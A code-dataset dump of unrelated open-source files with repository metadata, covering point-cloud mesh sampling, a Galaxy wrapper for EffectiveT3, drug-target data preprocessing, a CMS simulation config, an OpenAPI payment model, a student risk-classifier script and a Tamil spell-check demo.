rafael.mota@ufca.edu.br
|
1f52fc7b98a2980e9da9429774fccee2b8e054d2
|
ba8d566fe1fca8584601d70e209fef358d5aea16
|
/pyntcloud/sampling/s_mesh.py
|
5eb979a4acd73d38bf46e280431bc1d48fbb5e2b
|
[] |
no_license
|
threerivers3d-jc/pyntcloud
|
6d316954fdedbd0d336e51ca0c887913f077c6cb
|
81311d4cbca037a755353dc5fcf80acad9189513
|
refs/heads/master
| 2021-01-21T15:26:53.939132
| 2017-06-21T17:41:48
| 2017-06-21T17:41:48
| 91,844,119
| 0
| 0
| null | 2017-05-19T20:46:30
| 2017-05-19T20:46:30
| null |
UTF-8
|
Python
| false
| false
| 3,658
|
py
|
import numpy as np
import pandas as pd
from ..base import Sampling
from ..geometry.areas import triangle_area_multi
class Sampling_Mesh(Sampling):
"""
"""
def __init__(self, pyntcloud, rgb=False, normals=False):
super().__init__(pyntcloud)
self.rgb = rgb
self.normals = normals
def extract_info(self):
v1, v2, v3 = self.pyntcloud.get_mesh_vertices(rgb=self.rgb, normals=self.normals)
self.v1_xyz = v1[:, :3]
self.v2_xyz = v2[:, :3]
self.v3_xyz = v3[:, :3]
if self.rgb:
self.v1_rgb = v1[:, 3:6]
self.v2_rgb = v2[:, 3:6]
self.v3_rgb = v3[:, 3:6]
if self.normals:
self.v1_normals = v1[:, 6:]
self.v2_normals = v2[:, 6:]
self.v3_normals = v3[:, 6:]
elif self.normals:
self.v1_normals = v1[:, 3:6]
self.v2_normals = v2[:, 3:6]
self.v3_normals = v3[:, 3:6]
class RandomMesh(Sampling_Mesh):
""" Sample points adjusting probabilities according to triangle area.
Parameters
----------
n: int
Number of points to be sampled.
rgb: bool, optional
Default: False
Indicates if rgb values will be also sampled.
normals: bool, optional
Default: False
Indicates if normals will be also sampled.
"""
def __init__(self, pyntcloud, n, rgb=False, normals=False):
super().__init__(pyntcloud, rgb, normals)
self.n = n
def compute(self):
areas = triangle_area_multi(self.v1_xyz, self.v2_xyz, self.v3_xyz)
probabilities = areas / np.sum(areas)
random_idx = np.random.choice(np.arange(len(areas)), size=self.n, p=probabilities)
v1_xyz = self.v1_xyz[random_idx]
v2_xyz = self.v2_xyz[random_idx]
v3_xyz = self.v3_xyz[random_idx]
# (n, 1) the 1 is for broadcasting
u = np.random.rand(self.n, 1)
v = np.random.rand(self.n, 1)
is_a_problem = u + v > 1
u[is_a_problem] = 1 - u[is_a_problem]
v[is_a_problem] = 1 - v[is_a_problem]
result = pd.DataFrame()
result_xyz = (v1_xyz * u) + (v2_xyz * v) + ((1 - (u + v)) * v3_xyz)
result_xyz = result_xyz.astype(np.float32)
result["x"] = result_xyz[:,0]
result["y"] = result_xyz[:,1]
result["z"] = result_xyz[:,2]
if self.rgb:
v1_rgb = self.v1_rgb[random_idx]
v2_rgb = self.v2_rgb[random_idx]
v3_rgb = self.v3_rgb[random_idx]
result_rgb = (v1_rgb * u) + (v2_rgb * v) + ((1 - (u + v)) * v3_rgb)
result_rgb = result_rgb.astype(np.uint8)
result["red"] = result_rgb[:,0]
result["green"] = result_rgb[:,1]
result["blue"] = result_rgb[:,2]
if self.normals:
v1_normals = self.v1_normals[random_idx]
v2_normals = self.v2_normals[random_idx]
v3_normals = self.v3_normals[random_idx]
sum_normals = v1_normals + v2_normals + v3_normals
result_normals = sum_normals / np.linalg.norm(sum_normals, axis=1)[..., None]
result_normals = result_normals.astype(np.float32)
result["nx"] = result_normals[:,0]
result["ny"] = result_normals[:,1]
result["nz"] = result_normals[:,2]
return result
|
[
"daviddelaiglesiacastro@gmail.com"
] |
daviddelaiglesiacastro@gmail.com
|
f10d28f05fae8ab19c89469f1599948f39a0b6c6
|
9fbab0fd689ba1abbae4439a0e5bda315932f177
|
/tools/effectiveT3/effectiveT3.py
|
0254f325166f39f946564fa379f1c4f90dbfa794
|
[
"MIT"
] |
permissive
|
Imoteph/pico_galaxy
|
437cb5c9b231896fcfcafec902a0ed1f1c9646b3
|
2c81bd9f238aacf7fb2ac2b027706eff31d23cc5
|
refs/heads/master
| 2021-01-11T23:00:08.239492
| 2016-11-04T12:06:36
| 2016-11-04T12:06:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,603
|
py
|
#!/usr/bin/env python
"""Wrapper for EffectiveT3 v1.0.1 for use in Galaxy.
This script takes exactly five command line arguments:
* model name (e.g. TTSS_STD-1.0.1.jar)
* threshold (selective or sensitive)
* an input protein FASTA filename
* output tabular filename
It then calls the standalone Effective T3 v1.0.1 program (not the
webservice), and reformats the semi-colon separated output into
tab separated output for use in Galaxy.
"""
import sys
import os
import subprocess
# The Galaxy auto-install via tool_dependencies.xml will set this environment variable
effective_t3_dir = os.environ.get("EFFECTIVET3", "/opt/EffectiveT3/")
effective_t3_jar = os.path.join(effective_t3_dir, "TTSS_GUI-1.0.1.jar")
if "-v" in sys.argv or "--version" in sys.argv:
# TODO - Get version of the JAR file dynamically?
print("Wrapper v0.0.16, TTSS_GUI-1.0.1.jar")
sys.exit(0)
if len(sys.argv) != 5:
sys.exit("Require four arguments: model, threshold, input protein FASTA file & output tabular file")
model, threshold, fasta_file, tabular_file = sys.argv[1:]
if not os.path.isfile(fasta_file):
sys.exit("Input FASTA file not found: %s" % fasta_file)
if threshold not in ["selective", "sensitive"] \
and not threshold.startswith("cutoff="):
sys.exit("Threshold should be selective, sensitive, or cutoff=..., not %r" % threshold)
def clean_tabular(raw_handle, out_handle):
"""Clean up Effective T3 output to make it tabular."""
count = 0
positive = 0
errors = 0
for line in raw_handle:
if not line or line.startswith("#") \
or line.startswith("Id; Description; Score;"):
continue
assert line.count(";") >= 3, repr(line)
# Normally there will just be three semi-colons, however the
# original FASTA file's ID or description might have had
# semi-colons in it as well, hence the following hackery:
try:
id_descr, score, effective = line.rstrip("\r\n").rsplit(";", 2)
# Cope when there was no FASTA description
if "; " not in id_descr and id_descr.endswith(";"):
id = id_descr[:-1]
descr = ""
else:
id, descr = id_descr.split("; ", 1)
except ValueError:
sys.exit("Problem parsing line:\n%s\n" % line)
parts = [s.strip() for s in [id, descr, score, effective]]
out_handle.write("\t".join(parts) + "\n")
count += 1
if float(score) < 0:
errors += 1
if effective.lower() == "true":
positive += 1
return count, positive, errors
def run(cmd):
# Avoid using shell=True when we call subprocess to ensure if the Python
# script is killed, so too is the child process.
try:
child = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
except Exception, err:
sys.exit("Error invoking command:\n%s\n\n%s\n" % (" ".join(cmd), err))
# Use .communicate as can get deadlocks with .wait(),
stdout, stderr = child.communicate()
return_code = child.returncode
if return_code or stderr.startswith("Exception in thread"):
cmd_str = " ".join(cmd) # doesn't quote spaces etc
if stderr and stdout:
sys.exit("Return code %i from command:\n%s\n\n%s\n\n%s" % (return_code, cmd_str, stdout, stderr))
else:
sys.exit("Return code %i from command:\n%s\n%s" % (return_code, cmd_str, stderr))
if not os.path.isdir(effective_t3_dir):
sys.exit("Effective T3 folder not found: %r" % effective_t3_dir)
if not os.path.isfile(effective_t3_jar):
sys.exit("Effective T3 JAR file not found: %r" % effective_t3_jar)
if not os.path.isdir(os.path.join(effective_t3_dir, "module")):
sys.exit("Effective T3 module folder not found: %r" % os.path.join(effective_t3_dir, "module"))
effective_t3_model = os.path.join(effective_t3_dir, "module", model)
if not os.path.isfile(effective_t3_model):
sys.stderr.write("Contents of %r is %s\n"
% (os.path.join(effective_t3_dir, "module"),
", ".join(repr(p) for p in os.listdir(os.path.join(effective_t3_dir, "module")))))
sys.stderr.write("Main JAR was found: %r\n" % effective_t3_jar)
sys.exit("Effective T3 model JAR file not found: %r" % effective_t3_model)
# We will have write access whereever the output should be,
temp_file = os.path.abspath(tabular_file + ".tmp")
# Use absolute paths since will change current directory...
tabular_file = os.path.abspath(tabular_file)
fasta_file = os.path.abspath(fasta_file)
cmd = ["java", "-jar", effective_t3_jar,
"-f", fasta_file,
"-m", model,
"-t", threshold,
"-o", temp_file,
"-q"]
try:
# Must run from directory above the module subfolder:
os.chdir(effective_t3_dir)
except Exception:
sys.exit("Could not change to Effective T3 folder: %s" % effective_t3_dir)
run(cmd)
if not os.path.isfile(temp_file):
sys.exit("ERROR - No output file from Effective T3")
out_handle = open(tabular_file, "w")
out_handle.write("#ID\tDescription\tScore\tEffective\n")
data_handle = open(temp_file)
count, positive, errors = clean_tabular(data_handle, out_handle)
data_handle.close()
out_handle.close()
os.remove(temp_file)
if errors:
print("%i sequences, %i positive, %i errors"
% (count, positive, errors))
else:
print("%i/%i sequences positive" % (positive, count))
if count and count == errors:
# Galaxy will still allow them to see the output file
sys.exit("All your sequences gave an error code")
|
[
"p.j.a.cock@googlemail.com"
] |
p.j.a.cock@googlemail.com
|
622607fa7a7c60daa2e8c156f9d58d46032e3a4a
|
f1f21ba2236da38a49a8185ce33b3ce4a4424c1d
|
/apps/drug_target_interaction/moltrans_dti/preprocess.py
|
3919994d6fa4be6c6b1b0d8c44ecb5fd98b3b5e8
|
[
"Apache-2.0"
] |
permissive
|
PaddlePaddle/PaddleHelix
|
75a07c2f14475e56e72f4573b2cf82a91d1cbfda
|
e6ab0261eb719c21806bbadfd94001ecfe27de45
|
refs/heads/dev
| 2023-08-05T03:34:55.009355
| 2023-08-01T09:30:44
| 2023-08-01T09:30:44
| 314,704,349
| 771
| 197
|
Apache-2.0
| 2023-08-01T09:15:07
| 2020-11-21T00:53:39
|
Python
|
UTF-8
|
Python
| false
| false
| 5,501
|
py
|
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Data preprocessing
"""
from helper import utils
import paddle
from paddle import io
import os
import numpy as np
import pandas as pd
import codecs
from subword_nmt.apply_bpe import BPE
# Set global variable, drug max position, target max position
D_MAX = 50
T_MAX = 545
drug_vocab_path = './vocabulary/drug_bpe_chembl_freq_100.txt'
drug_codes_bpe = codecs.open(drug_vocab_path)
drug_bpe = BPE(drug_codes_bpe, merges=-1, separator='')
drug_temp = pd.read_csv('./vocabulary/subword_list_chembl_freq_100.csv')
drug_index2word = drug_temp['index'].values
drug_idx = dict(zip(drug_index2word, range(0, len(drug_index2word))))
target_vocab_path = './vocabulary/target_bpe_uniprot_freq_500.txt'
target_codes_bpe = codecs.open(target_vocab_path)
target_bpe = BPE(target_codes_bpe, merges=-1, separator='')
target_temp = pd.read_csv('./vocabulary/subword_list_uniprot_freq_500.csv')
target_index2word = target_temp['index'].values
target_idx = dict(zip(target_index2word, range(0, len(target_index2word))))
def drug_encoder(input_smiles):
"""
Drug Encoder
Args:
input_smiles: input drug sequence.
Returns:
v_d: padded drug sequence.
temp_mask_d: masked drug sequence.
"""
temp_d = drug_bpe.process_line(input_smiles).split()
try:
idx_d = np.asarray([drug_idx[i] for i in temp_d])
except:
idx_d = np.array([0])
flag = len(idx_d)
if flag < D_MAX:
v_d = np.pad(idx_d, (0, D_MAX - flag), 'constant', constant_values=0)
temp_mask_d = [1] * flag + [0] * (D_MAX - flag)
else:
v_d = idx_d[:D_MAX]
temp_mask_d = [1] * D_MAX
return v_d, np.asarray(temp_mask_d)
def target_encoder(input_seq):
"""
Target Encoder
Args:
input_seq: input target sequence.
Returns:
v_t: padded target sequence.
temp_mask_t: masked target sequence.
"""
temp_t = target_bpe.process_line(input_seq).split()
try:
idx_t = np.asarray([target_idx[i] for i in temp_t])
except:
idx_t = np.array([0])
flag = len(idx_t)
if flag < T_MAX:
v_t = np.pad(idx_t, (0, T_MAX - flag), 'constant', constant_values=0)
temp_mask_t = [1] * flag + [0] * (T_MAX - flag)
else:
v_t = idx_t[:T_MAX]
temp_mask_t = [1] * T_MAX
return v_t, np.asarray(temp_mask_t)
def concordance_index1(y, f):
"""
Compute the concordance index (CI)
Args:
y (ndarray): 1-dim ndarray representing the Kd from the ground truth.
f (ndarray): 1-dim ndarray representing the predicted Kd from the model.
Returns:
ci (float): the concordance index.
"""
ind = np.argsort(y)
y = y[ind]
f = f[ind]
i = len(y) - 1
j = i - 1
z = 0.0
S = 0.0
while i > 0:
while j >= 0:
if y[i] > y[j]:
z = z + 1
u = f[i] - f[j]
if u > 0:
S = S + 1
elif u == 0:
S = S + 0.5
j = j - 1
i = i - 1
j = i - 1
ci = S / z
return ci
class DataEncoder(io.Dataset):
"""
Data Encoder
"""
def __init__(self, ids, label, dti_data):
"""
Initialization
"""
super(DataEncoder, self).__init__()
self.ids = ids
self.label = label
self.data = dti_data
def __len__(self):
"""
Get size
"""
return len(self.ids)
def __getitem__(self, idx):
"""
Get embeddings of drug and target, label
"""
idx = self.ids[idx]
d_input = self.data.iloc[idx]['SMILES']
t_input = self.data.iloc[idx]['Target Sequence']
res = []
d_out, mask_d_out = drug_encoder(d_input)
res.append(d_out)
res.append(mask_d_out)
t_out, mask_t_out = target_encoder(t_input)
res.append(t_out)
res.append(mask_t_out)
labels = self.label[idx]
res.append(labels)
return res
class DataEncoderTest(io.Dataset):
    """Inference dataset: yields [drug emb, drug mask, target emb, target mask]."""

    def __init__(self, ids, dti_data):
        """Store sample ids and the raw drug-target dataframe (no labels)."""
        super(DataEncoderTest, self).__init__()
        self.ids = ids
        self.data = dti_data

    def __len__(self):
        """Number of samples."""
        return len(self.ids)

    def __getitem__(self, idx):
        """Encode one (drug, target) pair; no label at test time."""
        row = self.ids[idx]
        d_emb, d_mask = drug_encoder(self.data.iloc[row]['SMILES'])
        t_emb, t_mask = target_encoder(self.data.iloc[row]['Target Sequence'])
        return [d_emb, d_mask, t_emb, t_mask]
|
[
"noreply@github.com"
] |
PaddlePaddle.noreply@github.com
|
bf27c415d0043fd1bc4f0ca0022fb76d57c961a7
|
c73e8286579e7ba673440bac44bd527d416beaef
|
/MyNeutronSimHitAnalyzer/test_myneutronsimhitanalyzer_cfg.py
|
fefea3af0908ab0115fa557d29761f7fc67dfbf8
|
[] |
no_license
|
pietverwilligen/MyAnalyzers
|
6815cec717f2ede3f44070466e33c9b292d5b452
|
ccd04521747625d82a19174ebebb6a2cba53ddf2
|
refs/heads/master
| 2023-05-24T12:42:17.134907
| 2023-05-18T11:55:05
| 2023-05-18T11:55:05
| 16,079,295
| 1
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,417
|
py
|
import FWCore.ParameterSet.Config as cms

# cmsRun configuration for MyNeutronSimHitAnalyzer on Phase-2 (2026D99)
# neutron-background SIM samples.  Review added comments only; every
# configuration statement below is unchanged.
process = cms.Process("Demo")
process.load("FWCore.MessageService.MessageLogger_cfi")
# Alternative geometry / conditions loads kept commented for reference
# (Run-2, 2015, 2018, 2023 scenarios used in earlier studies):
# process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
# process.load('Configuration.Geometry.GeometryExtended_cff')
# process.load('Configuration.Geometry.GeometryExtendedPostLS1_cff')
# process.load('Configuration.Geometry.GeometryExtended2015Reco_cff')
# process.load('Configuration.Geometry.GeometryExtended2015_cff')
# process.load('Configuration.Geometry.GeometryExtended2023MuonReco_cff')
# process.load('Configuration.Geometry.GeometryExtended2023Muon_cff')
# process.load('Configuration.Geometry.GeometryExtended2023D17Reco_cff')
# process.load('Configuration.Geometry.GeometryExtended2023D17_cff')
# process.load('Configuration.StandardSequences.MagneticField_38T_PostLS1_cff') # ... assume not necessary anymore ...
# process.load('Configuration.Geometry.GeometryExtended2018Reco_cff')
# process.load('Configuration.Geometry.GeometryExtended2018_cff')
# Active geometry: Phase-2 detector scenario 2026D99.
process.load('Configuration.Geometry.GeometryExtended2026D99Reco_cff')
process.load('Configuration.Geometry.GeometryExtended2026D99_cff')
# process.load('Geometry.CommonDetUnit.globalTrackingGeometry_cfi')
# process.load("Geometry.MuonNumbering.muonNumberingInitialization_cfi")
# Muon-system geometries needed by the analyzer to resolve SimHit detIds.
process.load("Geometry.RPCGeometry.rpcGeometry_cfi") # ... needed? see if I can get rid of it ...
process.load("Geometry.CSCGeometry.cscGeometry_cfi")
process.load("Geometry.DTGeometry.dtGeometry_cfi")
# process.load("Geometry.GEMGeometry.gemGeometry_cfi") # ... does not exist ...
process.load("Alignment.CommonAlignmentProducer.FakeAlignmentSource_cfi")
# Load Events from python file
# ---------------------------------------------------------------------------------------
# option A
# ---------------------------------------------------------------------------------------
# process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
# readFiles = cms.untracked.vstring()
# secFiles = cms.untracked.vstring()
# source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
# ---------------------------------------------------------------------------------------
# option B  (active): event source defined in an importable python fragment
# ---------------------------------------------------------------------------------------
# process.load("MinBias_Phase2_14TeV_TuneCP5_100k_Neutron_XS_2026D99_1E4s")
process.load("Test_MinBias_Phase2_14TeV_TuneCP5_100k_Neutron_XS_2026D99_1E4s")
# ---------------------------------------------------------------------------------------
# option C
# ---------------------------------------------------------------------------------------
# process.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1) )
# process.source = cms.Source ("PoolSource",
#                              fileNames = cms.untracked.vstring('/store/user/piet/NeutronBackground/MinBias_Phase2_14TeV_GEN_SIM_XS_2026D99mod_100k_1E4s_13X_v1/crab_MinBias_Phase2_14TeV_100k_1E4s_XS_13X_v1/230504_162117/0000/step1_228.root'))
# ---------------------------------------------------------------------------------------
# Analyzer configuration; earlier output-name variants kept for reference.
process.demo = cms.EDAnalyzer('MyNeutronSimHitAnalyzer',
                              # ---------
                              # PdfFileNameBase = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s"),
                              # RootFileName    = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s.root"),
                              # ---------
                              # PdfFileNameBase = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s_SH30eV"),
                              # RootFileName    = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s_SH30eV.root"),
                              # ---------
                              # PdfFileNameBase = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s_Test"),
                              # RootFileName    = cms.untracked.string("MyNeutronSimHistograms_Run2_Neutron_XS_1E4s_Test.root"),
                              # ---------
                              PdfFileNameBase = cms.untracked.string("MyNeutronSimHistograms_Phase2_2026D99_Neutron_XS_1E4s"),
                              RootFileName = cms.untracked.string("MyNeutronSimHistograms_Phase2_2026D99_Neutron_XS_1E4s.root"),
                              # ---------
                              BunchSpacing = cms.untracked.double(25.0),
                              COMEnergy = cms.untracked.double(13.0),
                              # Simulated time window; variants below were used for shorter runs.
                              MaxSimTime = cms.untracked.double(10000000000000.0),  # 10000s = 10^13 ns [in ns]
                              # MaxSimTime = cms.untracked.double(1000000000000.0), # 1000s = 10^12 ns [in ns]
                              # MaxSimTime = cms.untracked.double(100000000000.0),  # 100s = 10^11 ns [in ns]
                              # MaxSimTime = cms.untracked.double(10000000000.0),   # 10s = 10^10 ns [in ns]
                              # MaxSimTime = cms.untracked.double(100000000.0),     # 100ms = 10^8 ns [in ns]
                              EDepCut30eV = cms.untracked.bool(True),
                              PhysicsDebug = cms.untracked.bool(True),
                              TechnicDebug = cms.untracked.bool(True),
                              )
process.p = cms.Path(process.demo)
|
[
"piet.verwilligen@cern.ch"
] |
piet.verwilligen@cern.ch
|
763c3a099affc2ad5ad0175153483332b443d153
|
d0efa2026b7ed22ff4f9aa76c27ae2474c30f26d
|
/openapi_client/models/location.py
|
f6293ef80984ebfdac4c0af34fa105e138e19331
|
[] |
no_license
|
begum-akbay/Python
|
2075650e0ddbf1c51823ebd749742646bf221603
|
fe8b47e29aae609b7510af2d21e53b8a575857d8
|
refs/heads/master
| 2023-03-28T00:11:00.997194
| 2021-03-25T16:38:17
| 2021-03-25T16:38:17
| 351,499,957
| 0
| 0
| null | 2021-03-25T16:38:17
| 2021-03-25T16:15:16
|
Python
|
UTF-8
|
Python
| false
| false
| 7,016
|
py
|
# coding: utf-8
"""
Payment Gateway API Specification.
The documentation here is designed to provide all of the technical guidance required to consume and integrate with our APIs for payment processing. To learn more about our APIs please visit https://docs.firstdata.com/org/gateway. # noqa: E501
The version of the OpenAPI document: 21.1.0.20210122.001
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
# NOTE(review): auto-generated OpenAPI model — only comments were added in
# review; regenerate (do not hand-edit) to change the model itself.
class Location(object):
    """NOTE: This class is auto generated by OpenAPI Generator.
    Ref: https://openapi-generator.tech

    Do not edit the class manually.
    """

    """
    Attributes:
      openapi_types (dict): The key is attribute name
                            and the value is attribute type.
      attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """
    openapi_types = {
        'location_id': 'str',
        'merchant_address': 'FraudAddress',
        'hierarchy': 'str',
        'timezone_offset': 'str',
        'user_defined': 'object'
    }

    attribute_map = {
        'location_id': 'locationId',
        'merchant_address': 'merchantAddress',
        'hierarchy': 'hierarchy',
        'timezone_offset': 'timezoneOffset',
        'user_defined': 'userDefined'
    }

    def __init__(self, location_id=None, merchant_address=None, hierarchy=None, timezone_offset=None, user_defined=None):  # noqa: E501
        """Location - a model defined in OpenAPI"""  # noqa: E501

        self._location_id = None
        self._merchant_address = None
        self._hierarchy = None
        self._timezone_offset = None
        self._user_defined = None
        self.discriminator = None

        # Only assign attributes the caller actually provided.
        if location_id is not None:
            self.location_id = location_id
        if merchant_address is not None:
            self.merchant_address = merchant_address
        if hierarchy is not None:
            self.hierarchy = hierarchy
        if timezone_offset is not None:
            self.timezone_offset = timezone_offset
        if user_defined is not None:
            self.user_defined = user_defined

    @property
    def location_id(self):
        """Gets the location_id of this Location.  # noqa: E501

        The unique ID of this location.  # noqa: E501

        :return: The location_id of this Location.  # noqa: E501
        :rtype: str
        """
        return self._location_id

    @location_id.setter
    def location_id(self, location_id):
        """Sets the location_id of this Location.

        The unique ID of this location.  # noqa: E501

        :param location_id: The location_id of this Location.  # noqa: E501
        :type: str
        """

        self._location_id = location_id

    @property
    def merchant_address(self):
        """Gets the merchant_address of this Location.  # noqa: E501

        :return: The merchant_address of this Location.  # noqa: E501
        :rtype: FraudAddress
        """
        return self._merchant_address

    @merchant_address.setter
    def merchant_address(self, merchant_address):
        """Sets the merchant_address of this Location.

        :param merchant_address: The merchant_address of this Location.  # noqa: E501
        :type: FraudAddress
        """

        self._merchant_address = merchant_address

    @property
    def hierarchy(self):
        """Gets the hierarchy of this Location.  # noqa: E501

        Free-text field to describe a hierarchy the merchant would like to provide.  # noqa: E501

        :return: The hierarchy of this Location.  # noqa: E501
        :rtype: str
        """
        return self._hierarchy

    @hierarchy.setter
    def hierarchy(self, hierarchy):
        """Sets the hierarchy of this Location.

        Free-text field to describe a hierarchy the merchant would like to provide.  # noqa: E501

        :param hierarchy: The hierarchy of this Location.  # noqa: E501
        :type: str
        """

        self._hierarchy = hierarchy

    @property
    def timezone_offset(self):
        """Gets the timezone_offset of this Location.  # noqa: E501

        The timezone offset from UTC to the merchants timezone configuration, specified in the format +hh:mm.  # noqa: E501

        :return: The timezone_offset of this Location.  # noqa: E501
        :rtype: str
        """
        return self._timezone_offset

    @timezone_offset.setter
    def timezone_offset(self, timezone_offset):
        """Sets the timezone_offset of this Location.

        The timezone offset from UTC to the merchants timezone configuration, specified in the format +hh:mm.  # noqa: E501

        :param timezone_offset: The timezone_offset of this Location.  # noqa: E501
        :type: str
        """

        self._timezone_offset = timezone_offset

    @property
    def user_defined(self):
        """Gets the user_defined of this Location.  # noqa: E501

        A JSON object that can carry any additional information about the location that might be helpful for fraud detection.  # noqa: E501

        :return: The user_defined of this Location.  # noqa: E501
        :rtype: object
        """
        return self._user_defined

    @user_defined.setter
    def user_defined(self, user_defined):
        """Sets the user_defined of this Location.

        A JSON object that can carry any additional information about the location that might be helpful for fraud detection.  # noqa: E501

        :param user_defined: The user_defined of this Location.  # noqa: E501
        :type: object
        """

        self._user_defined = user_defined

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        # Recursively serialize nested models, lists and dicts of models.
        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        return pprint.pformat(self.to_dict())

    def __repr__(self):
        """For `print` and `pprint`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, Location):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
|
[
"emargules@bluepay.com"
] |
emargules@bluepay.com
|
ad7e6bc02120ef80805bcd33c41a5689fdc3b3ae
|
d554b1aa8b70fddf81da8988b4aaa43788fede88
|
/5 - Notebooks e Data/1 - Análises numéricas/Arquivos David/Atualizados/logDicas-master/data/2019-1/222/users/4327/codes/1685_2471.py
|
3839f412181a0170517221e3c9d2dc2bcfbbf2a6
|
[] |
no_license
|
JosephLevinthal/Research-projects
|
a3bc3ca3b09faad16f5cce5949a2279cf14742ba
|
60d5fd6eb864a5181f4321e7a992812f3c2139f9
|
refs/heads/master
| 2022-07-31T06:43:02.686109
| 2020-05-23T00:24:26
| 2020-05-23T00:24:26
| 266,199,309
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 361
|
py
|
# Read age and BMI, echo them, then classify diabetes risk.
ida = int(input("idade:"))
imc = float(input("imc:"))
print("Entradas: {} anos e IMC {}".format(ida, imc))

# NOTE(review): inputs count as invalid only when BOTH age and BMI are out
# of range (the original used `and`); confirm with the exercise statement
# whether independent validation was intended.
idade_invalida = ida <= 0 or ida > 130
if idade_invalida and imc <= 0:
    print("Dados invalidos")
else:
    risco_idade = ida >= 45
    risco_imc = imc >= 22
    if risco_idade and risco_imc:
        print("Risco: Alto")
    elif risco_idade or risco_imc:
        print("Risco: Medio")
    else:
        print("Risco: Baixo")
|
[
"jvlo@icomp.ufam.edu.br"
] |
jvlo@icomp.ufam.edu.br
|
245ae97ad6a1378e1321ff246b20b6073791fbf7
|
d30855895ee0c6ddaef493039dd0e0f1298eeae6
|
/demo3.py
|
05468c0c352ed93b62578658570a7927fdf16d41
|
[
"GPL-1.0-or-later",
"GPL-3.0-only",
"MIT"
] |
permissive
|
Ezhil-Language-Foundation/open-tamil
|
f5f28463bff4400aa131b4a428e8f3e17aa63997
|
8ea745440f96fe587cf0959d12e990ad7923e60e
|
refs/heads/main
| 2022-12-23T13:50:19.758812
| 2022-12-16T21:56:02
| 2022-12-16T21:56:02
| 14,263,826
| 246
| 72
|
MIT
| 2022-09-24T17:49:10
| 2013-11-09T19:48:48
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 531
|
py
|
# -*- coding: utf-8 -*-
## (C) 2019 Muthiah Annamalai,
## This module is part of solthiruthi project under open-tamil umbrella.
## This code maybe used/distributed under MIT LICENSE.
from solthiruthi.dictionary import DictionaryBuilder, TamilVU
from solthiruthi.tamil99kbd import inv_confusion_matrix as kbd_cm
from solthiruthi.typographical import corrections

# Demo: build the TamilVU dictionary, then list typographical corrections
# (edit distance <= 2, Tamil-99 keyboard confusion matrix) for one word.
TVU, _ = DictionaryBuilder.create(TamilVU)
wl = corrections("அன்பம்", TVU, kbd_cm, ed=2)
for suggestion in wl:
    print(("u'%s'," % suggestion))
print(("L = %d" % len(wl)))
|
[
"ezhillang@gmail.com"
] |
ezhillang@gmail.com
|
dc8c9b4ea75f3e8b25d8678b445eb24ee988d0e3
|
c03c8d7363a3626b1178d241af3aa93a7b0b15e2
|
/unidesign/transients/__init__.py
|
3d50473e4a0abd9fdb247dd1784c2cc73cd211c5
|
[] |
no_license
|
luntan365/unidesign
|
0c9aa82df215fcff6be32840709ea51588cad805
|
ee24a7152d937d1b95c2bb67b3f050966850d50f
|
refs/heads/master
| 2020-12-01T07:50:18.444676
| 2011-09-11T10:54:41
| 2011-09-11T10:54:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,236
|
py
|
"""
Transient Dynamics for Neural Processing
Building Blocks
- Network N for the neuroanatomy with nodes representing neurons and edges representing connection weight
- A set of input pattern I extended in time, representing a spatio-temporal entity, thought of as the
activation of a subset of neurons that would be activated by the sensory signal transduction
- Mapping of e.g. odor identity and concentration to activation pattern I
Experimental physiological data
- Activity patterns, spike time events on the network nodes
Temporal Propagation Function (model)
- Fitting experimental activity pattern evolution given input pattern and anatomical connectivity
- Generate transients T using the fitted model for given input patterns
Algorithm:
- Extract the stable heteroclinic channels, i.e. the metastable saddle states
- Implement the Lotka-Volterra equation as a model to generate the transients
http://www.scipy.org/Cookbook/LoktaVolterraTutorial?action=show&redirect=LoktaVolterraTutorial
Try:
- extract from space-time object objects with a sliding time-window approach
existing only in a topological space (no distances), using open sets to define nearness
and use it for clustering into metastable states.
"""
|
[
"git@unidesign.ch"
] |
git@unidesign.ch
|
523a6572bc48a5326a93e982133be5b30218128c
|
acf8fe77e599f8372adf4fc971012394715795d6
|
/flask/EGG-INFO/enstaller/post_egginst.py
|
e91b753a7dca7f316b1ea217b327a33c095849ad
|
[] |
no_license
|
shaheershantk/Blog-Engine-Using-Flask
|
3e2f1457a59f282c336bbb63ff48171f938f5108
|
